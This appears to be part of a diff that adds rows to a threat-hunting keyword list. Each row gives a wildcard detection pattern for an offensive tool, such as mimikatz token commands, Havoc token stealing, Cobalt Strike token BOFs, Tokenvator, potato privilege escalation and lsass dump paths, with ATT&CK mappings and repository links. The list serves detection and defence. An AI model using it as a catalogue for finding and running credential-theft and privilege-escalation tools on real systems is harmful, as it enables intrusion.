+"*TlRMTVNTUAABAAAAMpCI4gAAAAAoAAAAAAAAACgAAAAGAbEdAAAADw==*","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","0","N/A","8","1","32","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z"
+"*TlRMTVNTUAACAAAABgAGADgAAAAFAomih5Y9EpIdLmMAAAAAAAAAAIAAgAA*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z"
+"*tls-scanner -connect *:*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*tmdb-get-company-names *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z"
+"*tmp*ciscophones.tgz*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems 
searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z"
+"*tmp*lsass_*.dmp*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,,
+"*Tmprovider.dll*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" 
+"*TMVB6XJWzuz4KsqUCnwxrtooQV9LmP6R4IX62HeQ7OZzhxgsahsxNzf05dJNkntl*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z"
+"*to_powershell.ducky_script*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*toggle_privileges.cna*","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","1","N/A","10","10","49","19","2021-09-14T18:50:42Z","2021-09-14T17:47:08Z"
+"*toggle_privileges_bof.*","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","1","N/A","10","10","49","19","2021-09-14T18:50:42Z","2021-09-14T17:47:08Z"
+"*Toggle_Token_Privileges_BOF*","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik 
Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","1","N/A","10","10","49","19","2021-09-14T18:50:42Z","2021-09-14T17:47:08Z"
+"*ToggleWDigest*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z"
+"*Tojan:Win32/Goodkit*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*token find-tokens*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - 
T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*token impersonate *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*token privs-get*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*token privs-list*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*token steal *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*token* -CreateProcess * -ProcessId *","offensive_tool_keyword","AD exploitation cheat sheet","Start new process with token of a specific user. Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*token* -ImpersonateUser -Username *","offensive_tool_keyword","AD exploitation cheat sheet","Start new process with token of a specific user. Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*token::elevate*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*token::list*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*token::revert*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*token::run*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*token::whoami*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*TokenDump.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z"
+"*TokenKidnapping.cpp*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z"
+"*TokenKidnapping.cpp*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z"
+"*TokenKidnapping.exe*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z"
+"*tokenprivs.cpp*","offensive_tool_keyword","elevationstation","elevate 
to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z"
+"*tokenprivs.exe*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z"
+"*TokenStealing.cs*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z"
+"*TokenStealing.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z"
+"*TokenStomp.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*TokenStripBOF/src*","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","1","N/A","10","10","28","5","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z"
+"*TokenTactics.psd1*","offensive_tool_keyword","TokenTactics","Azure JWT Token 
Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z"
+"*TokenTactics.psm1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z"
+"*TokenTactics-main.zip*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z"
+"*Tokenvator*","offensive_tool_keyword","Tokenvator","A tool to alter privilege with Windows Tokens","T1055 - T1003 - T1134","TA0004 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z"
+"*Tokenvator*.exe*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z"
+"*Tokenvator.csproj*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z"
+"*Tokenvator.exe*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z"
+"*Tokenvator.git*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z"
+"*Tokenvator.pdb*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z"
+"*Tokenvator.Plugins*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z"
+"*Tokenvator.Resources*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z"
+"*Tokenvator.sln*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z"
+"*Tokenvator/MonkeyWorks*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z"
+"*token-vault 
steal*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z"
